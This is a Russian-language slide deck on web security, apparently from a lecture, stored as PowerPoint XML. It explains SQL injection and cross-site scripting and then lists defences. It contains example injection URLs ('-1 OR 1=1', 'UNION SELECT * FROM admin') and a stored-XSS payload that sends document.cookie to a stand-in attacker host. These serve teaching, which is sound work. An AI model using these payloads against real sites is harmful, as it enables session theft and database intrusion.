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randomsite/?detai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randomsite/?detail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randomsite/?detai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QL injection.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injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cross site scripting (XSS).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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0" name="Screen Shot 2021-12-01 at 4.40.45 PM.png" descr="Screen Shot 2021-12-01 at 4.40.45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812256" y="61515"/>
            <a:ext cx="18759680" cy="13592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Компании пострадавшие от SQl injection: Target, Yahoo, Zappos, Equifax, Epic Games, TalkTalk, LinkedIn, Sony Pictures, Verizon (25% из всех украденных данных карт пользователей), et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Компании пострадавшие от SQl injection:</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Target, Yahoo, Zappos, Equifax, Epic Games, TalkTalk, LinkedIn, Sony Pictures, Verizon (25% из всех украденных данных карт пользователей), etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Компании пострадавшие от XXS:</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>EBay, British AirWays, Fortnite,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Внедрение SQL ко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Внедрение SQL кода</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Принцип атаки"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="2133600"/>
            <a:ext cx="21844000" cy="1016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Принцип атаки</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="http://randomsite/?id=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http://randomsite/?id</a:t>
            </a:r>
            <a:r>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>$id</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘id'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="19177C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$res</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mysqli_query(</a:t>
            </a:r>
            <a:r>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> news </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:t> id_smth = "</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="19177C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$id</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
            </a:endParaRP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http://randomsite/?id</a:t>
            </a:r>
            <a:r>
              <a:t>=-1+OR+1=1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> news </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:t> id_news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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1=1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Un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sp>
        <p:nvSpPr>
          <p:cNvPr id="16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$res = mysqli_query(&quot;SELECT * FROM news  WHERE id = “. $_REQUEST[‘id’]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19177C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$res</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mysqli_query(</a:t>
            </a:r>
            <a:r>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> news </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:t>id = “.</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="19177C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:t>‘id’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
            </a:endParaRP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http://randomsite/?id</a:t>
            </a:r>
            <a:r>
              <a:t>=-1+</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION+SELECT+*+FROM+admin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Экранирование хвоста запрос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Экранирование хвоста запроса</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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$res = mysqli_query(&quot;SELECT author FROM news  WHERE id=“.$_REQUEST['id'] .&quot; AND … ”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19177C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$res</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mysqli_query(</a:t>
            </a:r>
            <a:r>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> author </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> news </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:t> id=“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19177C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:t>'id'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:t> … ”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
            </a:endParaRP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http://randomsite/?id</a:t>
            </a:r>
            <a:r>
              <a:t>=-1+</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION+SELECT+*+FROM+admin</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr/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щи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Защита</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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Фильтрация строковых параметров -&gt; экранирование спецсимволов, query = 'SELECT * FROM users WHERE name = &quot;' + userName + '&quot;;'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Фильтрация строковых параметров -&gt; экранирование спецсимволов, query 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202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:t> name = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> userName </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:t>;'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Фильтрация чисел -&gt; проверка на число</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Усечение входных параметров</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Использование параметризированных запросов (prepared statements)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Параметризированный запро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Параметризированный запрос</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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qlCommand command = new SqlCommand(&quot;INSERT INTO Users (Name) VALUES (@name)&quot;, connection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</a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>SqlCommand </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:t> = new SqlCommand("INSERT INTO Users (Name) VALUES (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@name</a:t>
            </a:r>
            <a:r>
              <a:t>)", connection);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>SqlParameter </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nameParam</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:t> SqlParameter(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB003E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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@name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB003E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:t>, "N';INSERT INTO admin …”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:t>.Parameters.Add(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nameParam</a:t>
            </a:r>
            <a:r>
              <a:t>);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Межсайтовый скриптинг (XS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Межсайтовый скриптинг (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Внедрение кода в веб-страницу и взаимодействие это кода с веб-сервером хакера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Внедрение кода в веб-страницу и взаимодействие это кода с веб-сервером хакера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Ви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Виды</a:t>
            </a:r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Непостоянные (самые популярные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Непостоянные (самые популярные)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http://example.com/search.php?q=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;DoSomethingBad();&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;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Постоянные (наиболее разрушительные)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rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
            </a:endParaRP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rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.location</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“http://attackerhost.example/cgi-bin/cookiesteal.cgi?"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
            </a:endParaRP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rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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Защи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Защита</a:t>
            </a:r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Экранирование символ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Экранирование символов</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Кодирование управляющих html-символов и данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Обеспечение безопасности cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Указание кодировки на каждой веб-странице до пользовательских полей.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